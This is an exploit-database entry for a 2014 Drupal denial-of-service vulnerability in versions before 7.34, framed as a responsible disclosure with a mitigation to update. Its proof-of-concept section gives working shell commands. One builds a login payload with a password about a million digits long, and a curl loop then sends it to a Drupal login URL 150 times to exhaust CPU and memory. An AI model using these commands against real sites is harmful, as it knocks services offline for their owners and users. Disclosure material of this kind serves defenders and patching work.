Drupal Denial of Service Vulnerability

vendor:

Drupal

by:

Javer Nieto, Andres Rojas

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Drupal

Affected Version From: < 7.34

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2014

Drupal Denial of Service Vulnerability

A vulnerability present in Drupal < 7.34 allows an attacker to send specially crafted requests resulting in CPU and memory exhaustion. This may lead to the site becoming unavailable or unresponsive (denial of service).

Mitigation:

Update to the latest version of Drupal

Source

Exploit-DB raw data:

====================================================================
DESCRIPTION:
====================================================================
A vulnerability present in Drupal < 7.34 allows an attacker to send
specially crafted requests resulting in CPU and memory exhaustion. This
may lead to the site becoming unavailable or unresponsive (denial of
service).

====================================================================
Time Line:
====================================================================

November 19, 2014 - A Drupal security update and the security advisory
is published.

====================================================================
Proof of Concept:
====================================================================

Generate a pyaload and try with a valid user:

echo -n "name=admin&pass=" > valid_user_payload && printf "%s"
{1..1000000} >> valid_user_payload && echo -n "&op=Log
in&form_id=user_login" >> valid_user_payload

Perform a Dos with a valid user:

for i in `seq 1 150`; do (curl --data @valid_user_payload
http://yoursite/drupal/?q=user --silent > /dev/null &); sleep 0.5; done


====================================================================
Authors:
====================================================================

-- Javer Nieto -- http://www.behindthefirewalls.com
-- Andres Rojas -- http://www.devconsole.info

====================================================================
References:
====================================================================

* https://wordpress.org/news/2014/11/wordpress-4-0-1/

* https://www.drupal.org/SA-CORE-2014-006

*
http://www.behindthefirewalls.com/2014/11/wordpress-denial-of-service-responsible-disclosure.html

*
http://www.behindthefirewalls.com/2014/11/drupal-denial-of-service-responsible-disclosure.html

* http://www.devconsole.info/?p=1050